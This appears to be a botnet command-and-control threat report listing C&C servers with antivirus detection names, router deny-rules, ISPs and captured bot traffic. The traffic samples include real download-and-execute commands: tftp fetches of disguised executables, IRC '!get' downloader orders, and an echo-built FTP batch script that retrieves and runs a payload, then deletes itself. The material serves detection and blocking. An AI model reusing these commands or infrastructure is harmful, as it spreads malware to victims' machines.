  • Client: MODE #last +smntu
  • Server: :hub.20582.com 482 BWeBcttR #last :You're not channel operator

BotClient Antivirus Diagnoses
AhnLab-V3: IRCBot.variant
AntiVir: Rbot.cyj
Authentium: Backdoor2.EVZY
Avast: MISSED
AVG: Generic11.ABKQ
BitDefender: IRCBot.ACTA
CAT-QuickHeal: VanBot.bdt
ClamAV: MISSED
DrWeb: MISSED
eSafe: IRCBot
eTrust-Vet: Slenfbot!generic
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: PossibleThreat
F-Prot: Backdoor2.EVZY
F-Secure: VanBot.bdt
Ikarus: VanBot
Kaspersky: VanBot.bdt
McAfee: Nirbot.worm!a
Microsoft: VirTool_DelfInject.gen!AW
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: Delf.efj
Sophos: MalGeneric-A
Sunbelt: MISSED
Symantec: IRCBot
TheHacker: MISSED
TrendMicro: BKDR_VANBOT.RG
VBA32: Autorun.xdfc
VirusBuster: VanBot.BBW
Webwasher-Gateway: MISSED
Priority: 13
TCP Ports: 6669
Filter: deny ip host 190.12.5.5 any log ! 13 infects 07/11/09 to 07/12/09
Domain: corp-190-12-4-10-cue.puntonet.ec
ISP: puntonet s.a
Clients: 13
Country: ecuador
Activity Domain: corp-190-12-4-10-cue.puntonet.ec

Chatter Example
  • Client: NICK USA|2K|SP2|00|2905USER hohri 0 0 :\002\0034CodeD \0038By...
  • Server: :eat.a.dick NOTICE USA|2K|SP2|00|2905 :*** If you are having...
  • Server: PONG :7B586E46
  • Client: JOIN ##!X5 whores
  • Client: USERHOST USA|2K|SP2|00|2905MODE USA|2K|SP2|00|2905 -x+iJOIN ##!X5...
  • Server: PONG :eat.a.dick
  • Client: JOIN ##!X5 whores
  • Server: PONG :eat.a.dick
  • Client: JOIN ##!X5 whores
  • Server: PONG :eat.a.dick
  • Client: JOIN ##!X5 whores

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: MISSED
Authentium: MISSED
Avast: MISSED
AVG: MISSED
BitDefender: MISSED
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: MISSED
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: MISSED
Ikarus: MISSED
Kaspersky: MISSED
McAfee: MISSED
Microsoft: MISSED
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: MISSED
Sophos: MISSED
Sunbelt: MISSED
Symantec: MISSED
TheHacker: MISSED
TrendMicro: MISSED
VBA32: MISSED
VirusBuster: MISSED
Webwasher-Gateway: MISSED
Priority: 13
TCP Ports: 80
Filter: deny ip host 82.98.86.170 any log ! 13 infects 06/11/09 to 10/31/09
Domain: fhe3rz.net
ISP: sedo domain parking
Clients: 13
Country: germany
Activity Domain: fhe3rz.net

Chatter Example
  • Client: GET /xxxxxxx HTTP/1.0User-Agent: bHost: 203.180.17.238
  • Client: POST /w.php?ifc=0 HTTP/1.0Accept: image/gif, image/x-xbitmap,...
  • Server: GET...
  • Server: GET /css/724/landing/en.css HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/body_bg.jpg HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/td_bg.jpg HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/container_bg.jpg HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/keywords_bg.jpg HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/bullet.jpg HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/pop_cat_top.jpg HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/searchtext_bg.jpg HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/search.jpg HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/footer_bg.jpg HTTP/1.0Accept: */*Referer:...
  • Client: POST /w.php?ifc=0 HTTP/1.0Accept: image/gif, image/x-xbitmap,...
  • Client: POST /w.php?ifc=0 HTTP/1.0Accept: image/gif, image/x-xbitmap,...

BotClient Antivirus Diagnoses
AhnLab-V3: Korgo.46592
AntiVir: Padobot.Z.2
Authentium: Berbew.M
Avast: Padobot-I
AVG: Generic7.ORM
BitDefender: Generic.208542
CAT-QuickHeal: I-Padobot.z
ClamAV: Korgo.Z
DrWeb: HangUp.26
eSafe: MISSED
eTrust-Vet: Berkor.A
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: Berbew.M
F-Secure: Padobot.z
Ikarus: Padobot.Z
Kaspersky: Padobot.z
McAfee: MISSED
Microsoft: Berbew.BE!dam
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: Berbew.d
Sophos: Doxpar-C
Sunbelt: MISSED
Symantec: MISSED
TheHacker: MISSED
TrendMicro: BKDR_BERBEW.Q
VBA32: Padobot.z
VirusBuster: Padobot.B
Webwasher-Gateway: MISSED
Priority: 11
TCP Ports: 8080 8080 67
Filter: deny ip host 72.10.172.211 any log ! 11 infects 06/20/09 to 10/16/09
Domain: gtcomm.net
ISP: globotech communications
Clients: 11
Country: canada
Activity Domain: gtcomm.net

Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 24.103.196.250 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 24.103.196.250 get dllhost.exe wins\DLLHOST.EXE
  • Client: USER jseabq jseabq jseabq :dqhawgsvzjhxsrsm
  • Client: NICK ErEDHMyl
  • Client: MODE ErEDHMyl +xi
  • Client: GET /rs3.exe HTTP/1.0Host: idfc.info
  • Server: GET /f.exe HTTP/1.0Host: idfc.info
  • Client: JOIN #las6 USERHOST ErEDHMylMODE #m +smntuPRIVMSG #m...
  • Client: MODE #las6 +smntu
  • Server: :hub.20582.com 482 ErEDHMyl #las6 :You're not channel operator

BotClient Antivirus Diagnoses
AhnLab-V3: Virut
AntiVir: Virut.AT
Authentium: Virut.AG
Avast: Virtob
AVG: RBot.KB
BitDefender: IRC-Generic.3619
CAT-QuickHeal: Virut.Y
ClamAV: Small-4287
DrWeb: IRC.Sdbot.2665
eSafe: TRCrypt.nspm
eTrust-Vet: Virut.6640
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: Nepoe.EM!tr.bdr
F-Prot: Virut.AG
F-Secure: Nepoe.em
Ikarus: MISSED
Kaspersky: Nepoe.em
McAfee: Virut.gen.a
Microsoft: Virut.AA
NOD32v2: MISSED
Norman: Virut.AH
Panda: Virutas.AH
Prevx1: MISSED
Rising: Virut.al
Sophos: Virut-Gen
Sunbelt: MISSED
Symantec: Virut.W
TheHacker: Virut.genS
TrendMicro: PE_VIRUT.AT
VBA32: Nepoe.em
VirusBuster: PoeBot.OB
Webwasher-Gateway: MISSED
Priority: 10
TCP Ports: 65520 65520 91
Filter: deny ip host 91.121.221.157 any log ! 10 infects 08/22/09 to 09/05/09
Domain: -
ISP: fr-ovh
Clients: 10
Country: france
Activity Domain: -

Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 114.203.72.50 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 114.203.72.50 get dllhost.exe wins\DLLHOST.EXE
  • Client: NICK lejfnledUSER e020500 . . :_
  • Client: Service Pack 2JOIN &virtu
  • Server: :l. PRIVMSG lejfnled :!get http:/gidromash.cn/oc/box.txt
  • Client: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /op/lgate.php?n=6D05DF620DE704D8 HTTP/1.0Accept:...
  • Server: GET /lib/mr.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: PONG :l.
  • Client: JOIN &virtu
  • Server: PONG :l.
  • Client: JOIN &virtu
  • Server: PONG :l.
  • Client: JOIN &virtu
  • Server: PONG :l.
  • Client: JOIN &virtu
  • Server: PONG :l.
  • Client: JOIN &virtu
  • Server: PONG :l.
  • Client: JOIN &virtu
  • Server: PONG :l.
  • Client: JOIN &virtu

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: MISSED
Authentium: MISSED
Avast: MISSED
AVG: MISSED
BitDefender: MISSED
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: MISSED
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: Suspicious_Malware!Gemini
Ikarus: Hostil
Kaspersky: MISSED
McAfee: MISSED
Microsoft: Hostil.F
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: MISSED
Sophos: MalEncPk-IF
Sunbelt: MISSED
Symantec: MISSED
TheHacker: MISSED
TrendMicro: MISSED
VBA32: MISSED
VirusBuster: MISSED
Webwasher-Gateway: MISSED
Priority: 10
TCP Ports: 5190 67 6556 5190 72
Filter: deny ip host 83.68.16.6 any log ! 10 infects 06/17/09 to 09/19/09
Domain: xs4all.nl
ISP: xs4all internet bv
Clients: 10
Country: netherlands
Activity Domain: xs4all.nl

Chatter Example
  • Client: USER qifonx qifonx qifonx :imeqgcebisvovxly
  • Client: NICK znbXghHO
  • Server: NOTICE AUTH :*** Looking up your hostname...NOTICE AUTH :***...
  • Client: MODE znbXghHO +xi
  • Client: JOIN #las6 USERHOST znbXghHO
  • Server: :znbXghHO!qifonx@192.168.1.192 JOIN :#las6
  • Client: MODE #las6 +smntu
  • Server: :norks.org MODE #las6 +nt:norks.org 353 znbXghHO = #las6 :@wloos...
  • Client: USER qifonx qifonx qifonx :imeqgcebisvovxly
  • Server: NOTICE AUTH :*** Looking up your hostname...NOTICE AUTH :***...
  • Server: NICK znbXghHO
  • Client: USER qifonx qifonx qifonx :imeqgcebisvovxlyNICK znbXghHO
  • Client: MODE znbXghHO +xi
  • Client: JOIN #las6 USERHOST znbXghHO
  • Server: :znbXghHO!qifonx@192.168.1.192 JOIN :#las6
  • Client: MODE #las6 +smntu
  • Server: :norks.org MODE #las6 +nt:norks.org 353 znbXghHO = #las6 :@wloos...

BotClient Antivirus Diagnoses
AhnLab-V3: Win-Nepoe.58880
AntiVir: TRCrypt.XPACK.Gen
Authentium: Nepoe.A
Avast: MISSED
AVG: SHeur2.AIJS
BitDefender: IRC-Generic.5049
CAT-QuickHeal: Nepoe.hm
ClamAV: MISSED
DrWeb: Packed.162
eSafe: TRCrypt.XPACK
eTrust-Vet: Linkbot.VJ
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: Nepoe.YW!tr
F-Prot: Nepoe.A
F-Secure: Nepoe.hm
Ikarus: Packer.Krunchy.B
Kaspersky: Nepoe.hm
McAfee: MISSED
Microsoft: Poebot
NOD32v2: MISSED
Norman: Smalltroj.dam
Panda: BckNepoe.F
Prevx1: MISSED
Rising: Undef.dnb
Sophos: MalGeneric-A
Sunbelt: MISSED
Symantec: IRCBot
TheHacker: MISSED
TrendMicro: BKDR_NEPOE.CW
VBA32: Nepoe.hm
VirusBuster: Nepoe.DL
Webwasher-Gateway: MISSED
Priority 10 | TCP Ports 6556 194 | Filter: deny ip host 194.109.11.65 any log ! 10 infects 06/21/09 to 10/04/09 | xs4all.net | ISP: xs4all ppp _30 router subnets
Clients 10 (netherlands) | Activity Domain: xs4all.net
Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 67.10.66.79 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 67.10.66.79 get dllhost.exe wins\DLLHOST.EXE
  • Client: USER ylxs ylxs ylxs :xLegion/0x029NICK ylxs
  • Server: NOTICE AUTH :*** Looking up your hostname...NOTICE AUTH :***...
  • Client: JOIN #29# g3t0u7
  • Server: :ylxs!ylxs@192.168.1.179 JOIN :#29# g3t0u7
  • Server: :mindleak.com MODE #29# g3t0u7 +nt:mindleak.com 353 ylxs = #29#...
  • Client: USER kegkqj kegkqj kegkqj :xLegion/0x029NICK kegkqj
  • Server: NOTICE AUTH :*** Looking up your hostname...NOTICE AUTH :***...

BotClient Antivirus Diagnoses
AhnLab-V3: IRCBot.19968.B
AntiVir: SdBot.19968
Authentium: Sdbot.MIU
Avast: _Agent-IDE
AVG: Agent.10.BA
BitDefender: Generic.Sdbot.99B2E6B1
CAT-QuickHeal: SdBot.afu
ClamAV: Codbot-22
DrWeb: Detox.based
eSafe: SdBot.afu
eTrust-Vet: Toxbot!generic
Ewido: Agent.ri
FileAdvisor: MISSED
Fortinet: DcomRpc.AFU!tr.bdr
F-Prot: Sdbot.MIU
F-Secure: Horst.gen33
Ikarus: Agent.ri
Kaspersky: Agent.ri
McAfee: Sdbot.gen
Microsoft: Codbot.BU
NOD32v2: Codbot
Norman: SDBot.SML
Panda: Codbot.BS.worm
Prevx1: MISSED
Rising: Codbot.cr
Sophos: Codbot-AB
Sunbelt: MISSED
Symantec: IRCbot
TheHacker: BackdoorSdBot.afu
TrendMicro: MISSED
VBA32: SdBot.afu
VirusBuster: Rbot.Gen.15
Webwasher Gateway: SdBot.19968
Priority 8 | TCP Ports 3305 | Filter: deny ip host 200.49.145.197 any log ! 8 infects 09/04/09 to 11/02/09 | allytech.com | ISP: allytech s.a
Clients 8 (argentina) | Activity Domain: allytech.com
Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 173.16.120.174 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 173.16.120.174 get dllhost.exe wins\DLLHOST.EXE
  • Client: PASS secretpass
  • Client: NICK P|a6xnr2frjUSER a5fik9m7o * 0 :USA|2K|445
  • Server: :hub.49011.net 001 P|a6xnr2frj...
  • Client: USERHOST P|a6xnr2frj
  • Server: :hub.49011.net 302 P|a6xnr2frj...
  • Client: USERHOST P|a6xnr2frjMODE P|a6xnr2frj JOIN #mm RSA

BotClient Antivirus Diagnoses
AhnLab-V3: IRCBot.Gen
AntiVir: TRATRAPS.Gen
Authentium: MISSED
Avast: _DCom-F
AVG: SHeur2.BBMT
BitDefender: Generic.Mydoom.638E6D7B
CAT-QuickHeal: I-Kolabc.gza
ClamAV: MISSED
DrWeb: HLLW.Piabot.4
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: Kolabc.GZA!im
F-Prot: MISSED
F-Secure: Kolabc.gza
Ikarus: Kolabc
Kaspersky: Kolabc.gza
McAfee: MISSED
Microsoft: Kolabc.C
NOD32v2: MISSED
Norman: Akbot.BJT
Panda: Gaobot.OXI.worm
Prevx1: MISSED
Rising: Dropper.Undef.GEN
Sophos: MalBehav-104
Sunbelt: Generic!BT
Symantec: Spybot.Worm
TheHacker: MISSED
TrendMicro: KOLABC.GB
VBA32: Kolabc.gza
VirusBuster: RBot.Gen.3
Webwasher Gateway: MISSED
Priority 8 | TCP Ports 65520 91 | Filter: deny ip host 91.212.220.156 any log ! 8 infects 08/23/09 to 09/07/09 | - | ISP: group vertical ltd
Clients 8 (russian federation) | Activity Domain: -
Chatter Example
  • Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host:...
  • Client: NICK dtugkmbeUSER i020501 . . :-
  • Client: JOIN &virtu
  • Server: :k. PRIVMSG dtugkmbe :!get http:/gidromash.cn/oc/box.txt
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: NICK jddwnomeUSER n020501 . . :-
  • Client: JOIN &virtu
  • Server: :l. PRIVMSG jddwnome :!get http:/gidromash.cn/oc/box.txt
  • Server: PONG :l.
  • Client: JOIN &virtu
  • Server: PONG :l.
  • Client: JOIN &virtu

BotClient Antivirus Diagnoses
AhnLab-V3: Virut.B
AntiVir: Virut.AX
Authentium: Korgo.V
Avast: _Virtob
AVG: Korgo.A
BitDefender: Padobot.BV.Dam
CAT-QuickHeal: Virut.Z
ClamAV: Virut-54
DrWeb: Lsabot
eSafe: MISSED
eTrust-Vet: Virut.7115
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: Virut.AV
F-Prot: Korgo.V
F-Secure: MISSED
Ikarus: Padobot.M
Kaspersky: Padobot.m
McAfee: Virut.gen.a
Microsoft: Korgo.V
NOD32v2: MISSED
Norman: Korgo.V
Panda: Virutas.FG
Prevx1: MISSED
Rising: Virut.an
Sophos: Virut-W
Sunbelt: MISSED
Symantec: Virut.W
TheHacker: Virut.av
TrendMicro: PE_VIRUT.AV
VBA32: Virut.2
VirusBuster: Padobot.D
Webwasher Gateway: MISSED
Priority 7 | TCP Ports 3305 | Filter: deny ip host 211.233.45.253 any log ! 7 infects 09/01/09 to 09/08/09 | kidc.net | ISP: korea internet data center inc
Clients 7 (korea, republic of) | Activity Domain: kidc.net
Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 96.8.226.33 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 96.8.226.33 get dllhost.exe wins\DLLHOST.EXE
  • Client: PASS secretpass
  • Client: NICK P|tyz4nprpcUSER v7sfuv623 * 0 :USA|XP|126
  • Server: :hub.49523.net 001 P|tyz4nprpc...
  • Client: USERHOST P|tyz4nprpc
  • Server: :hub.49523.net 302 P|tyz4nprpc...
  • Client: USERHOST P|tyz4nprpcMODE P|tyz4nprpc JOIN #mm RSA

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: TRDropper.Gen
Authentium: Threat-HLLIYE!Eldorado
Avast: _DCom-F
AVG: Heur
BitDefender: Packer.Yoda.A
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: HLLW.Piabot.4
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: Threat-HLLIYE!Eldorado
F-Secure: MISSED
Ikarus: Exploit.MS06040
Kaspersky: Heur.Generic
McAfee: MISSED
Microsoft: Exploit_MS06040.gen
NOD32v2: MISSED
Norman: MISSED
Panda: TrjCI.A
Prevx1: MISSED
Rising: MISSED
Sophos: MalPacker
Sunbelt: MISSED
Symantec: MISSED
TheHacker: MISSED
TrendMicro: PAK_Generic.001
VBA32: MISSED
VirusBuster: PackedYoda
Webwasher Gateway: MISSED
Priority 5 | TCP Ports 3305 | Filter: deny ip host 203.146.251.62 any log ! 5 infects 06/11/09 to 11/03/09 | csloxinfo.net | ISP: reassign to paidc idc suapha-idc customer
Clients 5 (thailand) | Activity Domain: csloxinfo.net
Chatter Example
  • Client: PASS secretpass
  • Client: NICK P|ot4z09bbzUSER lnv4ddgy3 * 0 :USA|XP|651
  • Server: :hub.62014.net 001 P|ot4z09bbz...
  • Client: USERHOST P|ot4z09bbz
  • Server: :hub.62014.net 302 P|ot4z09bbz...
  • Client: USERHOST P|ot4z09bbzMODE P|ot4z09bbz JOIN #mm RSA
  • Client: PRIVMSG #mm...

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: TRDropper.Gen
Authentium: Threat-HLLIYE!Eldorado
Avast: _DCom-F
AVG: Heur
BitDefender: Packer.Yoda.A
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: HLLW.Piabot.4
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: Threat-HLLIYE!Eldorado
F-Secure: MISSED
Ikarus: Exploit.MS06040
Kaspersky: Heur.Generic
McAfee: MISSED
Microsoft: Exploit_MS06040.gen
NOD32v2: MISSED
Norman: MISSED
Panda: TrjCI.A
Prevx1: MISSED
Rising: MISSED
Sophos: MalPacker
Sunbelt: MISSED
Symantec: MISSED
TheHacker: MISSED
TrendMicro: PAK_Generic.001
VBA32: MISSED
VirusBuster: PackedYoda
Webwasher Gateway: MISSED
Priority 4 | TCP Ports 65520 65520 216 | Filter: deny ip host 218.93.205.23 any log ! 4 infects 08/19/09 to 08/20/09 | 163data.com.cn | ISP: chinanet jiangsu province network
Clients 4 (china) | Activity Domain: 163data.com.cn
Chatter Example
  • Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 85.132.5.169:1737
  • Client: NICK hxpxonzsUSER c020501 . . :-
  • Client: JOIN &virtu
  • Server: :i. PRIVMSG hxpxonzs :!get http:/dretis.cn/oc/box.txt

BotClient Antivirus Diagnoses
AhnLab-V3: Virut.B
AntiVir: Virut.AX
Authentium: Korgo.W
Avast: _Virtob
AVG: Korgo.D
BitDefender: Generic.1674959
CAT-QuickHeal: Virut.Z
ClamAV: MISSED
DrWeb: Lsabot
eSafe: Virut.n
eTrust-Vet: Virut.7115
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: Virut.AV
F-Prot: Korgo.W
F-Secure: Virut.av
Ikarus: Korgo.K
Kaspersky: Virut.av
McAfee: Virut.gen.a
Microsoft: Korgo.AB
NOD32v2: MISSED
Norman: Korgo.Y
Panda: Virutas.FG
Prevx1: MISSED
Rising: Junk.Virut.a
Sophos: Virut-W
Sunbelt: Generic!BT
Symantec: Virut.W
TheHacker: Virut.av
TrendMicro: PE_VIRUT.AV
VBA32: Virut.2
VirusBuster: Korgo.AB
Webwasher Gateway: MISSED
Priority 3 | TCP Ports 6668 6667 | Filter: deny ip host 91.121.83.177 any log ! 3 infects 08/22/09 to 08/22/09 | gergosnet.com | ISP: ovh sas
Clients 3 (france) | Activity Domain: gergosnet.com
Chatter Example
  • Client: USER 1
  • Server: 331 Password required
  • Client: PASS 1
  • Server: 230 User logged in.
  • Server: RETR mode.exe
  • Server: 150 Opening BINARY mode data connection
  • Server: 221 Goodbye happy r00ting.
  • Client: NICK gyreobciUSER cwbkcdugs 0 0 :gyreobci
  • Server: :irc.priv8net.com NOTICE AUTH :*** Looking up your...
  • Client: USERHOST gyreobci
  • Client: MODE gyreobci +xiJOIN ##Stab## qifort1USERHOST gyreobciMODE...
  • Server: PONG :irc.priv8net.com
  • Client: JOIN ##Stab## qifort1
  • Server: PONG :irc.priv8net.com
  • Client: JOIN ##Stab## qifort1
  • Server: PONG :irc.priv8net.com
  • Client: JOIN ##Stab## qifort1

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: MISSED
Authentium: MISSED
Avast: MISSED
AVG: MISSED
BitDefender: MISSED
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: MISSED
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: Suspicious_Malware!Gemini
Ikarus: MISSED
Kaspersky: MISSED
McAfee: MISSED
Microsoft: MISSED
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: MISSED
Sophos: MISSED
Sunbelt: MISSED
Symantec: MISSED
TheHacker: MISSED
TrendMicro: MISSED
VBA32: MISSED
VirusBuster: MISSED
Webwasher Gateway: MISSED
Priority 2 | TCP Ports 65520 216 | Filter: deny ip host 221.5.74.40 any log ! 2 infects 08/18/09 to 08/18/09 | cncnet.net | ISP: china unicom guangdong province network
Clients 2 (china) | Activity Domain: cncnet.net
Chatter Example
  • Client: NICK tztznbvfUSER f020501 . . :-
  • Server: NICK tztznbvfUSER f020501 . . :-JOIN &virtu
  • Server: :j. PRIVMSG tztznbvf :!get http:/dretis.cn/oc/box.txt
  • Client: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /op/lgate.php?n=94AEEEDFFCB64848 HTTP/1.0Accept:...
  • Server: GET /bt5/fout.php HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: GET /lib/bot.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: GET /lib/abb.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: GET /ag/lo.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: GET /dll/mal.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: GET...

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: MISSED
Authentium: MISSED
Avast: MISSED
AVG: MISSED
BitDefender: MISSED
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: MISSED
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: Suspicious_Malware!Gemini
Ikarus: Trojan-Downloader.Obitel
Kaspersky: MISSED
McAfee: MISSED
Microsoft: TrojanDownloader_Obitel.gen!C
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: MISSED
Sophos: MISSED
Sunbelt: MISSED
Symantec: MISSED
TheHacker: MISSED
TrendMicro: MISSED
VBA32: MISSED
VirusBuster: MISSED
Webwasher Gateway: MISSED
Priority 2 | TCP Ports 13001 12351 | Filter: deny ip host 122.160.232.194 any log ! 2 infects 09/13/09 to 10/30/09 | 122.airtelbroadband.in | ISP: abts-dsl-del
Clients 2 (india) | Activity Domain: 122.airtelbroadband.in
Chatter Example
  • Client: echo open 85.179.166.148 17323>.pif C:\WINDOWS\system32>
  • Client: echo user a a>>.pif C:\WINDOWS\system32>
  • Client: echo binary>>.pif C:\WINDOWS\system32>
  • Client: echo GET iexplorer.exe>>.pif C:\WINDOWS\system32>
  • Client: echo bye>>.pif C:\WINDOWS\system32>
  • Client: echo @echo off >c.batC:\WINDOWS\system32>
  • Client: echo ftp -n -v -s:.pif >>c.batC:\WINDOWS\system32>
  • Client: echo iexplorer.exe >>c.batC:\WINDOWS\system32>
  • Client: echo del .pif >>c.batC:\WINDOWS\system32>
  • Client: echo del /F c.bat >>c.batC:\WINDOWS\system32>
  • Client: echo exit /y >>c.batC:\WINDOWS\system32>
  • Client: USER a
  • Client: PASS a
  • Server: RETR iexplorer.exe
  • Client: NICK `tkhjqhirUSER `tkhjqhir 0 0 :`tkhjqhir
  • Server: :irc.priv8net.com NOTICE AUTH :*** Looking up your hostname...
  • Client: JOIN #.has hs
  • Client: USERHOST `tkhjqhirJOIN #.has hsUSERHOST `tkhjqhirJOIN #.has...
  • Server: :`tkhjqhir!~tkhjqhir@183C7886.415835BD.ED5D58B5.IP JOIN...
  • Server: PONG :irc.priv8net.com
  • Client: JOIN #.has hs
  • Server: PONG :irc.priv8net.com
  • Client: JOIN #.has hs
  • Server: PONG :irc.priv8net.com
  • Client: JOIN #.has hs
  • Server: PONG :irc.priv8net.com
  • Client: JOIN #.has hs
  • Server: PONG :irc.priv8net.com
  • Client: JOIN #.has hs
  • Server: PONG :irc.priv8net.com
  • Client: JOIN #.has hs
  • Server: PONG :irc.priv8net.com
  • Client: JOIN #.has hs
  • Server: PONG :irc.priv8net.com
  • Client: JOIN #.has hs

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: TRSpy.Games.A
Authentium: STZ_like!Generic
Avast: MISSED
AVG: PolyCrypt
BitDefender: MISSED
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: MISSED
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: STZ_like!Generic
F-Secure: Suspicious_Malware!Gemini
Ikarus: Virut.n
Kaspersky: MISSED
McAfee: MISSED
Microsoft: MISSED
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: MISSED
Sophos: MISSED
Sunbelt: MISSED
Symantec: MISSED
TheHacker: MISSED
TrendMicro: MISSED
VBA32: MISSED
VirusBuster: MISSED
Webwasher Gateway: Spy.Games.A
Priority 2 | TCP Ports 2345 | Filter: deny ip host 82.114.87.50 any log ! 2 infects 08/04/09 to 08/11/09 | atk-ks.org | ISP: yu-kujtesa
Clients 2 (serbia and montenegro) | Activity Domain: atk-ks.org
Chatter Example
  • Client: GET /mumie.exe HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Client: NICK NT50|32580900USER NT50|32580900 0 0 :NT50|32580900
  • Server: :irc.oc256.com NOTICE AUTH :*** Looking up your hostname...
  • Server: :irc.oc256.com NOTICE AUTH :*** Couldn't resolve your hostname;...
  • Server: :irc.oc256.com NOTICE NT50|32580900 :*** If you are having...
  • Server: PONG :A18EEE60
  • Client: JOIN #!MUM! Mixxx74
  • Server: :NT50|32580900 MODE NT50|32580900 :+i
  • Client: USERHOST NT50|32580900MODE NT50|32580900 +n+BJOIN #!MUM!...
  • Server: :irc.oc256.com 501 NT50|32580900 :Unknown MODE flag
  • Server: PONG :irc.oc256.com
  • Server: PONG :irc.oc256.com

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: MISSED
Authentium: MISSED
Avast: MISSED
AVG: MISSED
BitDefender: MISSED
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: MISSED
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: MISSED
Ikarus: MISSED
Kaspersky: MISSED
McAfee: MISSED
Microsoft: MISSED
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: MISSED
Sophos: MISSED
Sunbelt: MISSED
Symantec: MISSED
TheHacker: MISSED
TrendMicro: MISSED
VBA32: MISSED
VirusBuster: MISSED
Webwasher Gateway: MISSED
Priority 2 | TCP Ports 3305 | Filter: deny ip host 210.166.223.51 any log ! 2 infects 07/12/09 to 08/03/09 | hitachi-system.co.jp | ISP: prox-communicator(prox system design inc.)
Clients 2 (japan) | Activity Domain: hitachi-system.co.jp
Chatter Example
  • Client: PASS secretpass
  • Client: NICK P|jsmmnebfrUSER jy08fve9z * 0 :USA|XP|155
  • Server: :hub.4668.net 001 P|jsmmnebfr...
  • Client: USERHOST P|jsmmnebfr
